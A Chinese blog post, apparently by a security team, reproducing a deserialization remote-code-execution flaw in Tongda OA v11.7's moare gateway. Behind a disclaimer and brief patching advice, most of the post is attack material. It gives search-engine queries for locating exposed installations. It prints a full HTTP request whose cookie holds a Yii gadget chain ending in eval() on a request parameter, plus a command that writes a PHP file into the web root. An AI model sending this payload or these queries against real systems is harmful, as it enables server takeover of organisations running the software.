【漏洞复现】通达OA v11.7 moare 反序列化漏洞

于 2024-09-04 14:55:44 发布
阅读量290 收藏 3
点赞数 14
分类专栏: 漏洞复现 文章标签: web渗透 web 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41924764/article/details/141830551
版权

免责声明:

        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。如有侵权,请联系删除。

产品简介

通达OA(OfficeAnywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。

漏洞描述

通达OA v11.7 moare 存在 php反序列化漏洞,导致远程命令执行,控制服务器

网络空间测绘

Fofa

app="TDXK-通达OA"

Hunter

app.name=="通达 OA"

Quake

app:"通达OA系统"

image.png

漏洞复现

POST /general/appbuilder/web/portal/gateway/moare?a=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.3.4000 Chrome/30.0.1599.101 Safari/537.36
Content-Length: 114
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Cookie: _COOKIE=8a987cdbe51b7fe8c0efaf47430b18b96a1477de4a08291eef0f7164bd1b5a9cO%3A23%3A%22yii%5Cdb%5CBatchQueryResult%22%3A1%3A%7Bs%3A36%3A%22%00yii%5Cdb%5CBatchQueryResult%00_dataReader%22%3BO%3A17%3A%22yii%5Cdb%5CDataReader%22%3A1%3A%7Bs%3A29%3A%22%00yii%5Cdb%5CDataReader%00_statement%22%3BO%3A20%3A%22yii%5Credis%5CConnection%22%3A8%3A%7Bs%3A32%3A%22%00yii%5Credis%5CConnection%00unixSocket%22%3Bi%3A0%3Bs%3A8%3A%22hostname%22%3Bs%3A13%3A%22www.baidu.com%22%3Bs%3A4%3A%22port%22%3Bs%3A3%3A%22443%22%3Bs%3A17%3A%22connectionTimeout%22%3Bi%3A30%3Bs%3A29%3A%22%00yii%5Credis%5CConnection%00_socket%22%3Bb%3A0%3Bs%3A8%3A%22database%22%3BN%3Bs%3A13%3A%22redisCommands%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22CLOSE+CURSOR%22%3B%7Ds%3A27%3A%22%00yii%5Cbase%5CComponent%00_events%22%3Ba%3A1%3A%7Bs%3A9%3A%22afterOpen%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A32%3A%22yii%5Ccaching%5CExpressionDependency%22%3A2%3A%7Bs%3A10%3A%22expression%22%3Bs%3A23%3A%22eval%28%24_REQUEST%5B%27img%27%5D%29%3B%22%3Bs%3A8%3A%22reusable%22%3Bb%3A0%3B%7Di%3A1%3Bs%3A9%3A%22isChanged%22%3B%7Di%3A1%3Bs%3A1%3A%22a%22%3B%7D%7D%7D%7D%7D%7D

img=file_put_contents("../../TTEst.php","<?php echo md5('OKUldBoxbqr8O8lTCNj8wn3Z8Flp99Kv');unlink(__FILE__);?>");

image.png

/general/TTEst.php

image.png

修复建议

1、如⾮必要,禁⽌公⽹访问该系统。
2、用防火墙等安全设备设定访问规则,只允许白名单中的设备访问。
3、及时升级产品到最新版本。

凝聚力安全团队
关注
  • 14
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
漏洞复现-通达OA通达OA auth_mobi.php在线用户登录漏洞
xiaokp7的博客
08-03 1038
通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。通达OA 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统。
漏洞复现通达OA v11.7 在线任意用户登录漏洞
Adminxe的博客
03-08 7572
0x00 前言 通达OA V11.7版本存在这任意用户登录漏洞,该漏洞需要管理员在线才可以登录系统,另外一个方面就是编译在线的uid值进行判断。 具体fofa语法放在下面: app="TDXK-通达OA" 0x01 在线用户判断 访问 : http://xxx.xxx.xxx.xxx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 如果页面时空白的,则说明管理员在线,即可以利用 如果显示RELOGIN,则不...
通达OA v11.7 auth_mobi.php 在线用户登录漏洞复现
花开烟雨楼的博客
03-22 2800
通达OA,Office Anywhere的首字母,是通达信科旗下的品牌。通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统通达OA,Office Anywhere的首字母,是通达信科旗下的品牌。通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统。
通达OA v11.7 auth_mobi.php 在线用户登录漏洞
qq_36334672的博客
01-31 557
继续尝试访问:http://ip/mobile/auth_mobi.php?此时抓http://127.0.0.1/general/index.php 的包,把cookoie塞进去即可。接下来burp抓包。fofa:app=“通达OA通达OA v11.7。
通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本)
bluemoon_0的博客
02-15 783
通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本)
通达V11.7auth_mobi.php任意用户登录漏洞复现
qq_44828901的博客
06-19 915
傻瓜式复现通达V11.7auth_mobi.php任意用户登录
通达OA v11.7 在线用户登录漏洞附自写poc
yiiiing的博客
03-05 4435
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录一、漏洞描述二、漏洞影响三、漏洞复现四、漏洞利用POC五、总结 本文就介绍了通达OA v11.7 在线用户登录漏洞利用方法,及自己写得poc。 提示:以下是本篇文章正文内容,下面案例可供参考 一、漏洞描述 通达OA v11.7 中webroot\mobile\auth_mobi.php接口存在漏洞,无验证即可查询某个用户是否在线并返回PHPSESSION值使其可登录后台系统。 二、漏洞影响 通达OA < v11.7 三、漏
通达OA v11.7后台SQL注入
qq_44657899的博客
07-08 1626
文章目录漏洞描述漏洞影响漏洞复现 漏洞描述 通达OA v11.7后台存在SQL注入,可通过此漏洞写入恶意后门文件攻击目标服务器。 漏洞影响 通达OA <= v11.7 漏洞复现 下载通达oa 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe 漏洞位置:/general/hr/manage/query/delete_cascade.php ...
通达OA v11.7 在线任意用户登录漏洞
qq_44657899的博客
06-26 5704
漏洞描述 通达OA v11.7 中webroot\mobile\auth_mobi.php接口存在漏洞,无验证即可查询某个用户是否在线并返回PHPSESSION值使其可登录后台系统。 漏洞影响 通达OA V11.7 漏洞复现 首先访问http://xxx. xxx . xxx . xxx /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 ,如果页面时空白的,则说明管理员在线,即可以利用。 已经获取到了cookie,此时再访问http://xx.x
通达OA 11.7 后台sql注入getshell漏洞复现
Adminxe的博客
09-23 1643
0x00 漏洞描述 通达OA 11.7存在sql注入 0x01 漏洞影响版本 通达oa 11.7 利用条件:需要账号登录 0x02 漏洞复现 1、下载通达OA 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe,点击安装 2、condition_cascade参数存在布尔盲注 POC: GET /general/hr/manage/query/delete_cascade.php?condition_cascade=se...
通达OA v11.6 insert SQL注入漏洞.md
09-07
通达OA漏洞合集
通达OA v2017 video_file.php 任意文件下载漏洞.md
09-07
通达OA漏洞合集
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8444
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
PPT模板培训课件200MPPT模板培训课件200M
09-03
PPT模板培训课件200MPPT模板培训课件200M提取方式是百度网盘分享地址
2023-04-06-项目笔记 - 第二百四十五阶段 - 4.4.2.243全局变量的作用域-243 -2025.09.03
最新发布
09-03
2023-04-06-项目笔记-第二百四十五阶段-课前小分享_小分享1.坚持提交gitee 小分享2.作业中提交代码 小分享3.写代码注意代码风格 4.3.1变量的使用 4.4变量的作用域与生命周期 4.4.1局部变量的作用域 4.4.2全局变量的作用域 4.4.2.1全局变量的作用域_1 4.4.2.243局变量的作用域_243- 2024-09-03
(全新整理)2020年中国分省高精度森林覆盖数据集(省边界SHP+森林覆盖栅格数据)
09-03
1、资源内容地址:https://blog.csdn.net/2301_79696294/article/details/141282949 2、代码特点:今年全新,手工精心整理,放心引用,数据来自权威,相对于其他人的控制变量数据准确很多,适合写论文做实证用 ,不会出现数据造假问题 3、适用对象:大学生,本科生,研究生小白可用,容易上手!!! 3、课程引用: 经济学,地理学,城市规划与城市研究,公共政策与管理,社会学,商业与管理 基本信息 存储量:1.47GB 时间范围:2020年 空间范围:中国各省 数据格式:GeoTIFF 格式的栅格数据+Shp矢量格式
thulac:清华大学自然语言处理与社会人文计算实验室研制推出的一套中文词法分析工具包
09-03
thulac(Python实现):清华大学自然语言处理与社会人文计算实验室研制推出的一套中文词法分析工具包 THULAC(THU Lexical Analyzer for Chinese)由清华大学自然语言处理与社会人文计算实验室研制推出的一套中文词法分析工具包,具有中文分词和词性标注功能。THULAC具有如下几个特点: 能力强。利用我们集成的目前世界上规模最大的人工分词和词性标注中文语料库(约含5800万字)训练而成,模型标注能力强大。 准确率高。该工具包在标准数据集Chinese Treebank(CTB5)上分词的F1值可达97.3%,词性标注的F1值可达到92.9%,与该数据集上最好方法效果相当。 速度较快。同时进行分词和词性标注速度为300KB/s,每秒可处理约15万字。只进行分词速度可达到1.3MB/s。
基于Springboot的老年一站式服务平台演示+源代码+演示视频.zip
09-03
开发语言:Java 框架:springboot|ssm 技术:JSP JDK版本:JDK1.8 服务器:tomcat7 数据库:mysql 5.7(一定要5.7版本) 数据库工具:Navicat11 开发软件:eclipse/myeclipse/idea Maven包:Maven3.3.9 浏览器:谷歌浏览器 具体功能请看视频演示
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凝聚力安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值